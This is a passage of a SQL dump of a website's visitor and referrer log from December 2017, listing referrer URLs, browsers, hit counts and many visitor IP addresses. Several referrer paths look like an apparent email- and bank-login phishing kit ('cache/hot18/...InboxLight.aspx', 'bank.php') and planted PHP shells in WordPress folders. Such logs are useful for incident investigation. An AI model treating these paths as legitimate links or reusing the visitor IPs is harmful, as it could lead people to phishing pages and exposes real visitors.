,(15189,'2017-12-11','https://zphiblgz.org','SiteLockSpider','Unknown','Unknown','','184.154.36.183','000',1,0),(15190,'2017-12-11','https://zphiblgz.org','Chrome','Windows','15.0.874.121','','95.85.8.153','000',4,0),(15191,'2017-12-11','https://zphiblgz.org','Chrome','Windows','52.0.2743.116','','192.81.222.72','000',2,0),(15192,'2017-12-11','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','35.153.232.186','000',2,0),(15193,'2017-12-11','https://zphiblgz.org','Firefox','Windows','46.0','','52.87.221.164','000',4,0),(15194,'2017-12-11','https://zphiblgz.org','Chrome','Windows','18.6.872.0','','89.137.191.22','000',1,0),(15195,'2017-12-11','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.178','000',2,0),(15196,'2017-12-11','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.139','000',4,0),(15197,'2017-12-11','https://zphiblgz.org','Chrome','Windows','49.0.2623.112','','93.62.101.70','000',2,0),(15198,'2017-12-11','https://www.google.com/','Chrome','Android','51.0.2704.106','','64.233.172.160','000',1,0),(15199,'2017-12-11','https://www.google.com/','Chrome','Android','51.0.2704.106','','64.233.172.168','000',2,0),(15200,'2017-12-11','https://zphiblgz.org','MSIE','Windows','11.0','','137.200.32.6','000',5,0),(15201,'2017-12-11','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','54.164.67.17','000',2,0),(15202,'2017-12-11','https://zphiblgz.org','Safari','Macintosh','125.12','','193.128.114.45','000',1,0),(15203,'2017-12-11','https://zphiblgz.org/cache/hot18/esz7f1qmn9thl1q4izrlx3ig.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','171.25.193.77','000',1,0),(15204,'2017-12-11','https://zphiblgz.org','MSIE','Windows','10.0','','118.219.252.37','000',3,0),(15205,'2017-12-11','https://zphiblgz.org','MSIE','Windows','10.0','','118.219.252.36','000',2,0),(15206,'2017-12-11','https://zphiblgz.org','Chrome','Windows','7.0.517.44','','118.219.252.36','000',2,0),(15207,'2017-12-11','https://zphiblgz.org','Firefox','Windows','3.6.8','','118.219.252.36','000',2,0),(15208,'2017-12-11','https://zphiblgz.org','Opera','Windows','10.62','','118.219.252.36','000',2,0),(15209,'2017-12-11','https://zphiblgz.org','AppleWebkit','Android','528.5','','118.219.252.36','000',2,0),(15210,'2017-12-11','https://zphiblgz.org/cache/hot18/2b7hlgu7a3vxscod1sk20ize.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Safari','iPhone','10.3','','104.236.185.29','000',1,0),(15211,'2017-12-11','https://zphiblgz.org/cache/hot18/2b7hlgu7a3vxscod1sk20ize.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Edge','Windows','14.14393','','79.73.66.66','000',1,0),(15212,'2017-12-11','https://zphiblgz.org','MSIE','Windows','6.0','','178.62.99.175','000',1,0),(15213,'2017-12-11','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.1','000',4,0),(15214,'2017-12-11','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','54.157.224.174','000',4,0),(15215,'2017-12-11','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','31.168.158.239','000',2,0),(15216,'2017-12-11','https://zphiblgz.org','Chrome','Windows','18.6.872.0','','52.58.51.176','000',1,0),(15217,'2017-12-11','http://zphiblgz.org','Firefox','Windows','3.6.8','','86.47.80.145','000',10,0),(15218,'2017-12-11','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.154.106','000',2,0),(15219,'2017-12-11','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','54.205.134.1','000',2,0),(15220,'2017-12-11','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','54.158.205.173','000',2,0),(15221,'2017-12-11','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','173.69.157.50','000',5,0),(15222,'2017-12-11','https://zphiblgz.org','Firefox','Macintosh','40.0','','107.175.67.189','000',2,0),(15223,'2017-12-11','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','52.23.178.145','000',2,0),(15224,'2017-12-11','https://zphiblgz.org','Unknown','Unknown','Unknown','','211.55.19.11','000',2,0),(15225,'2017-12-11','https://zphiblgz.org','MSIE','Windows','11.0','','98.233.143.92','000',9,0),(15226,'2017-12-11','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.9.6','000',3,0),(15227,'2017-12-11','https://zphiblgz.org','Chrome','Windows','7.0.517.44','','118.219.252.37','000',2,0),(15228,'2017-12-11','https://zphiblgz.org','Firefox','Windows','3.6.8','','118.219.252.37','000',2,0),(15229,'2017-12-11','https://zphiblgz.org','Opera','Windows','10.62','','118.219.252.37','000',2,0),(15230,'2017-12-11','https://zphiblgz.org','AppleWebkit','Android','528.5','','118.219.252.37','000',2,0),(15231,'2017-12-11','https://zphiblgz.org','MSIE','Windows','8.0','','50.19.154.226','000',1,0),(15232,'2017-12-11','https://zphiblgz.org','MSIE','Windows','8.0','','52.27.2.86','000',1,0),(15233,'2017-12-11','https://zphiblgz.org','MSIE','Windows','8.0','','50.112.194.65','000',1,0),(15234,'2017-12-11','https://zphiblgz.org','Chrome','Android','56.0.2924.87','','71.244.137.250','000',2,0),(15235,'2017-12-11','https://zphiblgz.org','MSIE','Windows','6.0','','185.92.26.15','000',1,0),(15236,'2017-12-11','https://zphiblgz.org','Chrome','Windows','41.0.2224.3','','50.19.154.226','000',2,0),(15237,'2017-12-11','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.58','000',2,0),(15238,'2017-12-11','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','50.19.154.226','000',2,0),(15239,'2017-12-11','https://zphiblgz.org','Firefox','Windows','3.0.2.1','','83.31.128.235','000',1,0),(15240,'2017-12-11','https://zphiblgz.org','MSIE','Windows','7.0','','83.31.128.235','000',1,0),(15241,'2017-12-11','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','34.201.76.75','000',2,0),(15242,'2017-12-11','http://site.ru','Chrome','Windows','5.0.375.99','','77.74.51.110','000',2,0),(15243,'2017-12-11','https://zphiblgz.org','Safari','Macintosh','125.12','','193.128.114.43','000',1,0),(15244,'2017-12-11','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','54.89.83.97','000',2,0),(15245,'2017-12-11','https://zphiblgz.org/cache/hot18/z3vapebu8f9lys06bl305jjv.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Edge','Windows','15.15063','','46.101.94.163','000',2,0),(15246,'2017-12-11','https://zphiblgz.org/cache/hot18/z3vapebu8f9lys06bl305jjv.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Firefox','Windows','57.0','','162.243.187.126','000',2,0),(15247,'2017-12-11','https://zphiblgz.org/cache/hot18/fboqj2qbdjkbu7f2j9qjahg9.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Edge','Windows','14.14393','','162.243.187.126','000',2,0),(15248,'2017-12-11','http://zphiblgz.org/cache/hot18/fboqj2qbdjkbu7f2j9qjahg9.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Chrome','Windows','62.0.3202.94','','212.92.124.161','000',2,0),(15249,'2017-12-11','https://zphiblgz.org/cache/hot18/z3vapebu8f9lys06bl305jjv.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Safari','iPhone','10.0','','87.114.248.3','000',2,0),(15250,'2017-12-11','http://zphiblgz.org/cache/hot18/bank.php','MSIE','Windows','10.0','','162.243.187.126','000',18,0),(15251,'2017-12-11','https://zphiblgz.org/cache/hot18/fboqj2qbdjkbu7f2j9qjahg9.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Safari','iPhone','10.3','','46.101.94.163','000',2,0),(15252,'2017-12-11','https://zphiblgz.org/cache/hot18/fboqj2qbdjkbu7f2j9qjahg9.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Safari','iPhone','11.0','','87.114.248.3','000',2,0),(15253,'2017-12-11','http://zphiblgz.org/cache/hot18/kqldjei54e450b9vco74ltyw.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Safari','iPhone','10.0','','80.67.172.162','000',1,0),(15254,'2017-12-11','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','173.254.28.129','000',2,0),(15255,'2017-12-11','https://zphiblgz.org','Poster','Unknown','Unknown','','173.254.28.129','000',1,0),(15256,'2017-12-11','https://zphiblgz.org','Safari','iPad','11.0','','71.121.204.212','000',9,0),(15257,'2017-12-12','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',226,0),(15258,'2017-12-12','https://zphiblgz.org','Firefox','Windows','15.0a1','','174.127.133.21','000',2,0),(15259,'2017-12-12','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','184.73.43.45','000',4,0),(15260,'2017-12-12','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','222.209.83.50','000',2,0),(15261,'2017-12-12','https://zphiblgz.org','python-requests','Unknown','2.18.4','','35.161.55.221','000',2,0),(15262,'2017-12-12','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.0','000',1,0),(15263,'2017-12-12','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','54.158.205.173','000',2,0),(15264,'2017-12-12','http://site.ru','Chrome','Windows','5.0.375.99','','188.226.147.211','000',3,0),(15265,'2017-12-12','https://zphiblgz.org','MSIE','Windows','7.0','','54.37.98.157','000',1,0),(15266,'2017-12-12','https://zphiblgz.org','Chrome','Macintosh','44.0.2403.89','','54.245.37.244','000',2,0),(15267,'2017-12-12','https://zphiblgz.org','MSIE','Windows','7.0','','182.93.237.166','000',1,0),(15268,'2017-12-12','https://zphiblgz.org','MSIE','Windows','7.0','','69.87.219.74','000',1,0),(15269,'2017-12-12','http://zphiblgz.org/cache/hot18/o28z098fp1xk5ghc2jwofyu9.php','MSIE','Windows','10.0','','185.38.14.171','000',1,0),(15270,'2017-12-12','http://zphiblgz.org/','MSIE','Windows','10.0','','37.139.8.104','000',1,0),(15271,'2017-12-12','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','217.160.62.19','000',2,0),(15272,'2017-12-12','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','34.228.29.54','000',2,0),(15273,'2017-12-12','https://zphiblgz.org','Firefox','Windows','34.0','','92.245.38.230','000',1,0),(15274,'2017-12-12','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','34.235.170.179','000',4,0),(15275,'2017-12-12','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','52.206.158.107','000',4,0),(15276,'2017-12-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.204','000',2,0),(15277,'2017-12-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.53.83','000',1,0),(15278,'2017-12-12','zphiblgz.org','Chrome','Windows','58.0.1145.75','','37.187.77.211','000',4,0),(15279,'2017-12-12','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','185.2.4.34','000',2,0),(15280,'2017-12-12','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','52.55.228.120','000',2,0),(15281,'2017-12-12','http://site.ru','Chrome','Windows','5.0.375.99','','204.93.197.150','000',1,0),(15282,'2017-12-12','https://zphiblgz.org','Firefox','Windows','40.1','','101.182.92.147','000',3,0),(15283,'2017-12-12','https://zphiblgz.org','Chrome','Windows','57.0.2987.98','','50.97.98.153','000',4,0),(15284,'2017-12-12','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','54.89.49.201','000',2,0),(15285,'2017-12-12','https://www.google.com/','Chrome','Windows','62.0.3202.94','','167.102.134.98','000',3,0),(15286,'2017-12-12','http://site.ru','Chrome','Windows','5.0.375.99','','162.144.119.186','000',1,0),(15287,'2017-12-12','https://search.yahoo.com/','Firefox','Macintosh','52.0','','50.225.39.86','000',9,0),(15288,'2017-12-12','http://www.zphiblgz.org/wp-content/upgrade/theme-compat/popup-pomo.php','Chrome','Windows','42.0.2311.152','','216.244.65.58','000',1,0),(15289,'2017-12-12','https://zphiblgz.org','Unknown','Unknown','Unknown','','209.54.58.185','000',1,0),(15290,'2017-12-12','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','54.164.193.4','000',2,0),(15291,'2017-12-12','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','192.249.124.203','000',2,0),(15292,'2017-12-12','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.29','000',1,0),(15293,'2017-12-12','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.20','000',1,0),(15294,'2017-12-12','https://zphiblgz.org','Chrome','Linux','65.0.3290.0','','54.164.236.2','000',2,0),(15295,'2017-12-12','zphiblgz.org','Chrome','Windows','50.0.2661.75','','82.165.140.254','000',1,0),(15296,'2017-12-12','https://zphiblgz.org','Chrome','Windows','62.0.3177.0','','41.200.131.139','000',1,0),(15297,'2017-12-12','https://zphiblgz.org','Chrome','Linux','65.0.3292.0','','35.153.160.106','000',2,0),(15298,'2017-12-12','http://site.ru','Chrome','Windows','5.0.375.99','','166.62.119.173','000',2,0),(15299,'2017-12-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','45.62.253.113','000',2,0),(15300,'2017-12-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.80.148','000',1,0),(15301,'2017-12-12','https://www.google.com/','Edge','Windows','15.15063','','76.107.144.231','000',2,0),(15302,'2017-12-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','87.118.116.12','000',1,0),(15303,'2017-12-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.230.5','000',1,0),(15304,'2017-12-12','https://zphiblgz.org','Firefox','Windows','40.0','','195.22.127.195','000',2,0),(15305,'2017-12-12','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',5,0),(15306,'2017-12-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','46.165.254.166','000',1,0),(15307,'2017-12-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','144.217.60.239','000',1,0),(15308,'2017-12-12','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.21','000',2,0),(15309,'2017-12-12','https://zphiblgz.org/cache/hot18/brha2jtavu66sc1p2ro4tx92.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Safari','iPhone','11.0','','173.239.226.139','000',1,0),(15310,'2017-12-12','https://zphiblgz.org/cache/hot18/brha2jtavu66sc1p2ro4tx92.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Chrome','Android','34.0.1847.114','','196.54.55.9','000',1,0),(15311,'2017-12-12','https://zphiblgz.org/cache/hot18/brha2jtavu66sc1p2ro4tx92.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Firefox','Linux','52.0','','51.15.39.2','000',1,0),(15312,'2017-12-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','94.130.59.167','000',2,0),(15313,'2017-12-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.220.101.30','000',1,0),(15314,'2017-12-12','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','172.93.123.4','000',2,0),(15315,'2017-12-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','178.156.202.125','000',1,0),(15316,'2017-12-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','62.102.148.67','000',1,0),(15317,'2017-12-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','51.15.63.229','000',1,0),(15318,'2017-12-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','85.248.227.164','000',2,0),(15319,'2017-12-12','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.220.101.4','000',1,0),(15320,'2017-12-12','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.154','000',2,0),(15321,'2017-12-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','80.67.172.162','000',1,0),(15322,'2017-12-12','http://zphiblgz.org','Firefox','Windows','3.6.8','','89.234.68.90','000',10,0),(15323,'2017-12-12','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.51.197.174','000',4,0),(15324,'2017-12-12','https://zphiblgz.org','Firefox','Windows','40.1','','175.158.201.52','000',2,0),(15325,'2017-12-12','https://zphiblgz.org','Firefox','Windows','40.1','','175.158.201.29','000',1,0),(15326,'2017-12-12','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','73.173.254.31','000',5,0),(15327,'2017-12-12','http://site.ru','Chrome','Windows','5.0.375.99','','163.53.249.23','000',2,0),(15328,'2017-12-12','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','13.56.229.65','000',2,0),(15329,'2017-12-12','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','209.58.183.55','000',2,0),(15330,'2017-12-12','zphiblgz.org','Chrome','Windows','50.0.2661.75','','37.187.77.211','000',1,0),(15331,'2017-12-12','http://site.ru','Chrome','Windows','5.0.375.99','','162.241.218.58','000',1,0),(15332,'2017-12-12','https://zphiblgz.org','Faraday','Unknown','Unknown','','54.205.32.71','000',1,0),(15333,'2017-12-12','http://zphiblgz.org/appa/','Chrome','Windows','49.0.2623.112','','195.184.208.222','000',3,0),(15334,'2017-12-12','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.103.106','000',3,0),(15335,'2017-12-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','51.15.189.90','000',1,0),(15336,'2017-12-12','https://zphiblgz.org','Firefox','Windows','7.0.1','','93.115.95.206','000',2,0),(15337,'2017-12-12','https://zphiblgz.org','MSIE','Windows','7.0','','38.100.21.64','000',1,0),(15338,'2017-12-13','https://zphiblgz.org','Firefox','Windows','7.0.1','','171.25.193.77','000',2,0),(15339,'2017-12-13','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',271,0),(15340,'2017-12-13','https://webcache.googleusercontent.com/search?q=cache:BDzM7pujVS0J:https://zphiblgz.org/scholarship/application/+&cd=7&hl=en&ct=clnk&gl=us','Chrome','Windows','61.0.3163.100','','128.84.126.139','000',1,0),(15341,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','193.107.36.33','000',1,0),(15342,'2017-12-13','https://zphiblgz.org','Firefox','Windows','7.0.1','','104.218.63.74','000',2,0),(15343,'2017-12-13','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.220.101.21','000',1,0),(15344,'2017-12-13','http://zphiblgz.org/scholarship/','Chrome','Windows','63.0.3239.84','','73.173.254.31','000',1,0),(15345,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','109.70.4.247','000',1,0),(15346,'2017-12-13','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','123.207.93.207','000',2,0),(15347,'2017-12-13','https://zphiblgz.org','Poster','Unknown','Unknown','','123.207.93.207','000',1,0),(15348,'2017-12-13','https://zphiblgz.org','Firefox','Windows','34.0','','31.8.93.188','000',1,0),(15349,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','119.59.120.33','000',2,0),(15350,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','195.128.184.27','000',1,0),(15351,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','151.248.121.57','000',2,0),(15352,'2017-12-13','https://zphiblgz.org','Firefox','Windows','34.0','','176.51.33.200','000',1,0),(15353,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','184.168.200.93','000',1,0),(15354,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','178.208.83.43','000',1,0),(15355,'2017-12-13','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','141.138.168.124','000',2,0),(15356,'2017-12-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','138.197.111.108','000',3,0),(15357,'2017-12-13','https://zphiblgz.org','Firefox','Windows','40.1','','119.192.189.248','000',2,0),(15358,'2017-12-13','http://m.facebook.com','Safari','iPhone','10.0','','173.252.124.61','000',1,0),(15359,'2017-12-13','http://m.facebook.com','Safari','iPhone','10.0','','173.252.124.54','000',1,0),(15360,'2017-12-13','https://zphiblgz.org/','Safari','iPhone','10.0','','173.252.124.60','000',1,0),(15361,'2017-12-13','https://zphiblgz.org','Safari','iPhone','9.0','','36.248.62.59','000',1,0),(15362,'2017-12-13','https://zphiblgz.org','Safari','iPhone','9.0','','223.166.244.46','000',1,0),(15363,'2017-12-13','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','138.197.7.48','000',1,0),(15364,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','193.239.44.195','000',1,0),(15365,'2017-12-13','https://zphiblgz.org/','Chrome','Macintosh','59.0.3071.115','','183.89.120.242','000',3,0),(15366,'2017-12-13','https://www.google.com/','Chrome','Windows','63.0.3239.84','','198.202.2.101','000',8,0),(15367,'2017-12-13','https://zphiblgz.org','MSIE','Windows','11.0','','192.198.80.227','000',1,0),(15368,'2017-12-13','http://m.facebook.com','AppleWebKit','iPhone','604.3.5','','190.120.192.67','000',2,0),(15369,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','91.223.180.231','000',2,0),(15370,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','74.220.202.28','000',2,0),(15371,'2017-12-13','https://zphiblgz.org','Firefox','Windows','40.1','','175.137.53.235','000',3,0),(15372,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','67.225.133.82','000',1,0),(15373,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','62.75.163.62','000',2,0),(15374,'2017-12-13','https://zphiblgz.org','MSIE','Windows','10.0','','118.219.252.36','000',2,0),(15375,'2017-12-13','https://zphiblgz.org','Chrome','Windows','7.0.517.44','','118.219.252.36','000',2,0),(15376,'2017-12-13','https://zphiblgz.org','Firefox','Windows','3.6.8','','118.219.252.36','000',2,0),(15377,'2017-12-13','https://zphiblgz.org','Opera','Windows','10.62','','118.219.252.36','000',2,0),(15378,'2017-12-13','https://zphiblgz.org','AppleWebkit','Android','528.5','','118.219.252.36','000',2,0),(15379,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','80.78.250.28','000',1,0),(15380,'2017-12-13','https://zphiblgz.org','Chrome','Windows','41.0.2228.0','','95.85.8.153','000',1,0),(15381,'2017-12-13','https://zphiblgz.org','FS','Unknown','Unknown','','95.85.8.153','000',1,0),(15382,'2017-12-13','https://zphiblgz.org','MSIE','Windows','6.0','','178.62.99.175','000',1,0),(15383,'2017-12-13','https://zphiblgz.org','MSIE','Windows','6.0','','65.19.167.131','000',1,0),(15384,'2017-12-13','https://zphiblgz.org','PerfectMail','Unknown','2.0','','50.31.160.72','000',1,0),(15385,'2017-12-13','https://zphiblgz.org','Chrome','Windows','56.0.2924.87','','31.168.158.239','000',2,0),(15386,'2017-12-13','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.146','000',2,0),(15387,'2017-12-13','https://zphiblgz.org','MSIE','Windows','6.0','','154.16.149.74','000',1,0),(15388,'2017-12-13','https://zphiblgz.org','Chrome','Windows','56.0.2924.76','','64.74.215.1','000',4,0),(15389,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','37.17.224.134','000',1,0),(15390,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','187.73.33.63','000',2,0),(15391,'2017-12-13','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','66.96.183.7','000',2,0),(15392,'2017-12-13','https://zphiblgz.org','Chrome','Windows','40.0.2214.85','','173.239.215.15','000',2,0),(15393,'2017-12-13','https://zphiblgz.org','Firefox','Windows','3.6.13','','77.40.129.123','000',1,0),(15394,'2017-12-13','http://zphiblgz.org/cache/hot18/2b7hlgu7a3vxscod1sk20ize.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','185.220.101.4','000',1,0),(15395,'2017-12-13','https://zphiblgz.org/cache/hot18/2b7hlgu7a3vxscod1sk20ize.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Chrome','Android','34.0.1847.114','','51.15.189.90','000',2,0),(15396,'2017-12-13','http://zphiblgz.org/cache/hot18/2b7hlgu7a3vxscod1sk20ize.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Safari','iPhone','11.0','','104.236.185.29','000',2,0),(15397,'2017-12-13','http://zphiblgz.org/cache/hot18/2b7hlgu7a3vxscod1sk20ize.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Edge','Windows','14.14393','','46.101.94.163','000',2,0),(15398,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','94.130.21.112','000',1,0),(15399,'2017-12-13','https://zphiblgz.org','Java','Unknown','1.6.0','','69.164.111.198','000',6,0),(15400,'2017-12-13','https://zphiblgz.org','MSIE','Windows','8.0','','69.164.111.198','000',35,0),(15401,'2017-12-13','https://zphiblgz.org','python-requests','Unknown','2.9.1','','67.137.36.66','000',1,0),(15402,'2017-12-13','https://zphiblgz.org','Chrome','Windows','41.0.2224.3','','50.19.154.226','000',1,0),(15403,'2017-12-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','211.55.19.11','000',1,0),(15404,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','192.185.176.12','000',1,0),(15405,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','192.185.2.204','000',1,0),(15406,'2017-12-13','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','208.76.113.2','000',5,0),(15407,'2017-12-13','http://site.ru','Chrome','Windows','5.0.375.99','','118.190.152.107','000',1,0),(15408,'2017-12-13','zphiblgz.org','Chrome','Windows','50.0.2661.75','','176.31.107.99','000',9,0),(15409,'2017-12-13','https://zphiblgz.org','MSIE','Windows','6.0','','185.104.187.60','000',1,0),(15410,'2017-12-13','https://zphiblgz.org/cache/hot18/h1dg7jspf8hgzbjsms3cuj4j.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','11.0','','173.239.212.30','000',1,0),(15411,'2017-12-13','https://zphiblgz.org/cache/hot18/h1dg7jspf8hgzbjsms3cuj4j.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','Safari','iPhone','11.0','','188.166.63.71','000',1,0),(15412,'2017-12-13','http://zphiblgz.org/cache/hot18/5qhkm4lqz57psml5jbkqjx0k.php?subscribed_user=&.rand=13InboxLight.aspx?n=1774256418&fid=4','MSIE','Windows','10.0','','193.15.16.4','000',1,0),(15413,'2017-12-13','https://zphiblgz.org','Chrome','Windows','57.0.2987.98','','50.97.98.153','000',2,0),(15414,'2017-12-13','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',4,0),(15415,'2017-12-13','https://www.google.com/','Firefox','Windows','57.0','','129.2.181.154','000',2,0),(15416,'2017-12-13','https://www.google.com/','Firefox','Windows','57.0','','128.8.35.203','000',2,0),(15417,'2017-12-13','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','128.8.35.203','000',2,0),(15418,'2017-12-13','https://zphiblgz.org','MSIE','Windows','8.0','','64.235.154.104','000',2,0),(15419,'2017-12-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','61.154.29.53','000',22,0),(15420,'2017-12-13','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','148.72.14.136','000',2,0),(15421,'2017-12-13','https://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.45.183','000',1,0),(15422,'2017-12-13','https://zphiblgz.org','Unknown','Unknown','Unknown','','155.64.38.77','000',1,0),(15423,'2017-12-13','https://zphiblgz.org','MSIE','Windows','9.0','','173.205.33.19','000',2,0),(15424,'2017-12-13','https://zphiblgz.org','MSIE','Windows','8.0','','217.96.193.100','000',1,0),(15425,'2017-12-13','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','173.254.28.129','000',2,0),(15426,'2017-12-14','https://zphiblgz.org','WHR','Unknown','Unknown','','74.220.219.51','000',231,0),(15427,'2017-12-14','https://zphiblgz.org','Chrome','Windows','57.0.2987.98','','50.97.98.153','000',2,0),(15428,'2017-12-14','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','104.254.213.194','000',2,0),(15429,'2017-12-14','http://zphiblgz.org/wp-includes/css/modules.php','Chrome','Windows','42.0.2311.152','','195.154.168.130','000',1,0),(15430,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','176.10.104.240','000',1,0),(15431,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','178.20.55.16','000',1,0),(15432,'2017-12-14','http://zphiblgz.org/','Firefox','Windows','7.0.1','','185.220.101.16','000',1,0),(15433,'2017-12-14','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.100.149.189','000',1,0),(15434,'2017-12-14','https://zphiblgz.org','Firefox','Windows','40.1','','119.224.240.30','000',4,0),(15435,'2017-12-14','https://zphiblgz.org','Chrome','Linux','50.0.2661.75','','34.216.79.16','000',2,0),(15436,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','176.37.38.208','000',1,0),(15437,'2017-12-14','https://zphiblgz.org','Firefox','Windows','7.0.1','','199.249.223.43','000',2,0),(15438,'2017-12-14','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1635.i_Rlh939e-pImuuUVR-RVB--CaP_XtdiGEvVfG4Klti_q6Wzx1-8JPFFfzxbYgbO.2ddf765c1e3d35827b958dba62b3234f733b2878&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgU